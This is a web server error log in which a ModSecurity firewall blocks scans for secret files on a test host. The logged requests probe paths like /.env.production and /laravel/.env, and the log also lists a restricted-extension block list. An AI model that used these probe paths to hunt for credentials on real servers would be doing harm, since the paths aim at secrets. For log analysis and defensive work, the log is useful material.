[Fri Jun 13 09:27:50.381680 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEvS9gXwH85pB-AP3sYPzwAAAAg"]
[Fri Jun 13 09:27:50.381886 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEvS9gXwH85pB-AP3sYPzwAAAAg"]
[Fri Jun 13 09:27:50.419726 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEvS9gXwH85pB-AP3sYP0AAAAAg"]
[Fri Jun 13 09:27:50.419964 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEvS9gXwH85pB-AP3sYP0AAAAAg"]
[Fri Jun 13 09:27:50.420149 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEvS9gXwH85pB-AP3sYP0AAAAAg"]
[Fri Jun 13 09:27:50.540519 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEvS9gXwH85pB-AP3sYP0QAAAAg"]
[Fri Jun 13 09:27:50.540686 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEvS9gXwH85pB-AP3sYP0QAAAAg"]
[Fri Jun 13 09:27:50.540923 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEvS9gXwH85pB-AP3sYP0QAAAAg"]
[Fri Jun 13 09:27:50.541133 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEvS9gXwH85pB-AP3sYP0QAAAAg"]
[Fri Jun 13 09:27:50.604200 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEvS9gXwH85pB-AP3sYP0gAAAAg"]
[Fri Jun 13 09:27:50.604440 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEvS9gXwH85pB-AP3sYP0gAAAAg"]
[Fri Jun 13 09:27:50.604637 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEvS9gXwH85pB-AP3sYP0gAAAAg"]
[Fri Jun 13 09:27:50.868847 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEvS9gXwH85pB-AP3sYP1QAAAAg"]
[Fri Jun 13 09:27:50.869087 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEvS9gXwH85pB-AP3sYP1QAAAAg"]
[Fri Jun 13 09:27:50.869320 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEvS9gXwH85pB-AP3sYP1QAAAAg"]
[Fri Jun 13 09:27:55.140675 2025] [authz_core:error] [pid 3821258] [client 185.177.72.210:49658] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Fri Jun 13 09:27:55.361485 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEvS-wXwH85pB-AP3sYP3wAAAAg"]
[Fri Jun 13 09:27:55.361725 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEvS-wXwH85pB-AP3sYP3wAAAAg"]
[Fri Jun 13 09:27:55.361912 2025] [:error] [pid 3821258] [client 185.177.72.210:49658] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEvS-wXwH85pB-AP3sYP3wAAAAg"]
[Fri Jun 13 13:29:01.075875 2025] [:error] [pid 3820919] [client 196.251.83.232:41460] [client 196.251.83.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEwLfbZgZlJJd-uIkFQmfQAAAAI"]
[Fri Jun 13 13:29:01.076157 2025] [:error] [pid 3820919] [client 196.251.83.232:41460] [client 196.251.83.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEwLfbZgZlJJd-uIkFQmfQAAAAI"]
[Fri Jun 13 13:29:01.076325 2025] [:error] [pid 3820919] [client 196.251.83.232:41460] [client 196.251.83.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aEwLfbZgZlJJd-uIkFQmfQAAAAI"]
[Tue Jun 17 04:21:10.911736 2025] [:error] [pid 3908140] [client 93.123.109.81:40000] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFDRFjtYDhvm_gvpEQAuBgAAAAY"]
[Tue Jun 17 04:21:10.913892 2025] [:error] [pid 3908140] [client 93.123.109.81:40000] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFDRFjtYDhvm_gvpEQAuBgAAAAY"]
[Tue Jun 17 04:21:10.914093 2025] [:error] [pid 3908140] [client 93.123.109.81:40000] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aFDRFjtYDhvm_gvpEQAuBgAAAAY"]
[Tue Jun 17 04:21:11.056451 2025] [:error] [pid 3908101] [client 93.123.109.81:40002] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFDRF6cJXdle0SIV2QQ7wgAAAAQ"]
[Tue Jun 17 04:21:11.056702 2025] [:error] [pid 3908101] [client 93.123.109.81:40002] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFDRF6cJXdle0SIV2QQ7wgAAAAQ"]
[Tue Jun 17 04:21:11.056894 2025] [:error] [pid 3908101] [client 93.123.109.81:40002] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aFDRF6cJXdle0SIV2QQ7wgAAAAQ"]
[Tue Jun 17 04:21:11.196897 2025] [:error] [pid 3908098] [client 93.123.109.81:40016] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aFDRF5aC0pY9nZTQ5Luh_gAAAAE"]
[Tue Jun 17 04:21:11.197136 2025] [:error] [pid 3908098] [client 93.123.109.81:40016] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aFDRF5aC0pY9nZTQ5Luh_gAAAAE"]
[Tue Jun 17 04:21:11.197325 2025] [:error] [pid 3908098] [client 93.123.109.81:40016] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aFDRF5aC0pY9nZTQ5Luh_gAAAAE"]
[Tue Jun 17 04:21:11.322781 2025] [:error] [pid 3908100] [client 93.123.109.81:40024] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aFDRFy_DE3YIegHh_V4uUAAAAAM"]
[Tue Jun 17 04:21:11.323024 2025] [:error] [pid 3908100] [client 93.123.109.81:40024] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aFDRFy_DE3YIegHh_V4uUAAAAAM"]
[Tue Jun 17 04:21:11.323194 2025] [:error] [pid 3908100] [client 93.123.109.81:40024] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aFDRFy_DE3YIegHh_V4uUAAAAAM"]
[Tue Jun 17 04:21:12.648936 2025] [:error] [pid 3908097] [client 93.123.109.81:40092] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aFDRGFxArPK3DhdjpodSPgAAAAA"]
[Tue Jun 17 04:21:12.649192 2025] [:error] [pid 3908097] [client 93.123.109.81:40092] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aFDRGFxArPK3DhdjpodSPgAAAAA"]
[Tue Jun 17 04:21:12.649370 2025] [:error] [pid 3908097] [client 93.123.109.81:40092] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aFDRGFxArPK3DhdjpodSPgAAAAA"]
[Tue Jun 17 04:21:12.728147 2025] [:error] [pid 3908099] [client 93.123.109.81:40106] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aFDRGBbycCdpHdwniILGHgAAAAI"]
[Tue Jun 17 04:21:12.728400 2025] [:error] [pid 3908099] [client 93.123.109.81:40106] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aFDRGBbycCdpHdwniILGHgAAAAI"]
[Tue Jun 17 04:21:12.728567 2025] [:error] [pid 3908099] [client 93.123.109.81:40106] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aFDRGBbycCdpHdwniILGHgAAAAI"]
